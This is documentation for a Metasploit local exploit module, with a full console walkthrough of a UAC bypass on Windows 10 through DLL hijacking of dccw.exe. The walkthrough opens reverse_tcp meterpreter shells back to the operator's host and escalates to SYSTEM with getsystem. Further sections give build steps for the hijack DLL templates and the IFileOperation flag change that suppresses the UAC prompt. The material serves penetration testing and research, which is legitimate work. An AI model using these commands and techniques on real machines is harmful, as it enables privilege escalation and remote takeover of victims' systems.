Vulnerable Application
This module adds a bypass for UAC that relies on DLL hijacking of the dccw.exe process. It has been tested on and supports both x86 and x64 releases of Windows 8, 8.1, 10_1511, 10_1607, and 10_1703. It does not work with any versions of Windows 7.
Not Applicable; works on stock Windows releases.
Running Example:
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
> set LHOST <MSF_IP>
LHOST => <MSF_IP>
> set LPORT 30009
LPORT => 30009
> show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST <MSF_IP> yes The listen address
LPORT 30009 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
> run -z
[*] Started reverse TCP handler on <MSF_IP>:30009
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x86_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:30009 -> <Win10x86_IP>:50041) at 2017-10-03 12:17:42 -0700
[*] Session 1 created in the background.
> sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 1 (<Win10x86_IP>)
Computer : WIN10X86-1511
OS : Windows 10 (Build 10586).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 4
Meterpreter : x86/windows
> sessions -C ifconfig
[*] Running 'ifconfig' on meterpreter session 1 (<Win10x86_IP>)
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 2
============
Name : Teredo Tunneling Pseudo-Interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : 2001:0:4137:9e76:38b8:1e49:3f57:795f
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::38b8:1e49:3f57:795f
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 3
============
Name : Intel(R) 82574L Gigabit Network Connection
Hardware MAC : 00:0c:29:73:25:67
MTU : 1500
IPv4 Address : <Win10x86_IP>
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::cc97:6548:c10a:f034
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 6
============
Name : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:c0a8:86a0
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
> sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/windows WIN10X86-1511\msfuser @ WIN10X86-1511 <MSF_IP>:30009 -> <Win10x86_IP>:50041 (<Win10x86_IP>)
> use exploit/windows/local/bypassuac_injection_winsxs
> set session 1
session => 1
> set target 0
target => 0
> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
> set lhost <MSF_IP>
lhost => <MSF_IP>
> set lport 30010
lport => 30010
> set verbose true
verbose => true
> show options
Module options (exploit/windows/local/bypassuac_injection_winsxs):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST <MSF_IP> yes The listen address
LPORT 30010 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
> run -j
[*] Exploit running as background job.
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-meterpreter-reverse_tcp-192x168x134x160-30009.rc)> Ruby Code (13 bytes)
[*] Started reverse TCP handler on <MSF_IP>:30010
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-meterpreter-reverse_tcp-192x168x134x160-30009.rc)> Ruby Code (12 bytes)
[+] Windows 10 (Build 10586). may be vulnerable.
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Creating temporary folders...
[*] Uploading the Payload DLL to the filesystem...
[*] Payload DLL 18944 bytes long being uploaded...
[*] Spawning process with Windows Publisher Certificate, to inject into...
[*] Injecting into process ID 3476
[*] Opening process 3476
[*] Injecting struct into 3476
[*] Executing payload
[+] Successfully injected payload in to process: 3476
[*] Sending stage (957487 bytes) to <Win10x86_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:30010 -> <Win10x86_IP>:50078) at 2017-10-03 12:19:03 -0700
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the file specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the file specified.
[+] All the dropped elements have been successfully removed
> sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/windows WIN10X86-1511\msfuser @ WIN10X86-1511 <MSF_IP>:30009 -> <Win10x86_IP>:50041 (<Win10x86_IP>)
2 meterpreter x86/windows WIN10X86-1511\msfuser @ WIN10X86-1511 <MSF_IP>:30010 -> <Win10x86_IP>:50078 (<Win10x86_IP>)
> sessions -C getuid
[*] Running 'getuid' on meterpreter session 1 (<Win10x86_IP>)
Server username: WIN10X86-1511\msfuser
[*] Running 'getuid' on meterpreter session 2 (<Win10x86_IP>)
Server username: WIN10X86-1511\msfuser
> sessions -C getsystem
[*] Running 'getsystem' on meterpreter session 1 (<Win10x86_IP>)
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[*] Running 'getsystem' on meterpreter session 2 (<Win10x86_IP>)
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
> sessions -C getuid
[*] Running 'getuid' on meterpreter session 1 (<Win10x86_IP>)
Server username: WIN10X86-1511\msfuser
[*] Running 'getuid' on meterpreter session 2 (<Win10x86_IP>)
Server username: NT AUTHORITY\SYSTEM
> exit -y
Compiling Instructions
Compiling Template DLLs
To build the x86 template dll, use data/templates/src/pe/dll_gdiplus/build.sh (Requires mingw-w64 package from apt)
cd data/templates/src/pe/dll_gdiplus
./build.sh
cp data/templates/src/pe/dll_gdiplus/template_x86_windows.dll data/templates/template_x86_windows_dccw_gdiplus.dll
To build the x64 binary (In an x64 VS2013 command prompt)
Z:\metasploit-framework\data\templates\src\pe\dll_gdiplus>cl.exe -LD template.c /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain "kernel32.lib"
cp data/templates/src/pe/dll_gdiplus/template.dll data/templates/template_x64_windows_dccw_gdiplus.dll
Compiling bypassuac-x86.dll and bypassuac-x64.dll
Open the Visual studio solution located in metasploit-framework/external/source/exploits/bypassuac_injection/ Choose release
from the Solution configurations, build the x86 and x64 solutions. The binaries should already be in the right place.
(From PR)
I decided to create a different module and not to update the one called "bypassuac_injection", because in order to perform a DLL hijacking, I need to create several folders in which insert our malicious DLL. Also, I deleted these files and folders in a different way, instead using the method "register_file_for_cleanup()", so as to be able to remove the created folders and also prevent a very large output.
If you want to understand the module in a deeper way I recommend you to visit the C++ project on my github: https://github.com/L3cr0f/DccwBypassUAC
DLL INJECTION
/metasploit-framework/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp /metasploit-framework/data/post/bypassuac-x64.dll /metasploit-framework/data/post/bypassuac-x86.dll
To perform the DLL hijacking we need to copy the file of our interest to a specific location (in our case "C:\Windows\System32") using IFileOperation. To do so, first we need to inject a DLL that will perform this task. This DLL is almost the same as the one used in the "bypassuac_injection" module, but, in latest Windows 10 systems (build equal or greater than 15003), the IFileOperation must be invoked in a different way so as to not trigger the UAC prompt. This modification will be:
if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)
to
if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)
Note that this modification does not affect other modules. To conclude this section, I didn't found the code of "/metasploit-framework/data/post/bypassuac-[ARCH].exe" to update it.
DLL HIJACKING
/metasploit-framework/data/templates/template_x86_windows_dccw_gdiplus.dll /metasploit-framework/data/templates/template_x64_windows_dccw_gdiplus.dll /metasploit-framework/data/templates/src/pe/dll_gdiplus/template.c /metasploit-framework/data/templates/src/pe/dll_gdiplus/template.h /metasploit-framework/data/templates/src/pe/dll_gdiplus/template.def /metasploit-framework/data/templates/src/pe/dll_gdiplus/template.rc /metasploit-framework/data/templates/src/pe/dll_gdiplus/build.sh /metasploit-framework/lib/msf/core/exploit/exe.rb /metasploit-framework/lib/msf/util/exe.rb
To execute code at high integrity we need to perform a DLL hijacking, but we cannot use the DLL templates provided by Metasploit since we need to forward some functions to the legit DLL, so we need to create a new couple of DLL templates, which are exactly the same but including the forwarding feature (the way I have implemented does not work on Windows 7). Now, despite working in a successfully way, I think it would be great including this forwarding feature on the fly, I mean, without having to create an additional DLL template. I don't know how this can be done, so if you come up with something, let me know.
Also, to load the previous DLL template we have modified the mentioned "exe.rb" files.
Setup the vulnerable environment
The vulnerable environment setup is the same as the module "bypassuac_injection", we need a meterpreter session, select the architecture (0 for x86 and 1 for x64), select the meterpreter payload based on the architecture we want to execute with high integrity and set the regular parameters of the payload (LHOST, LPORT, etc).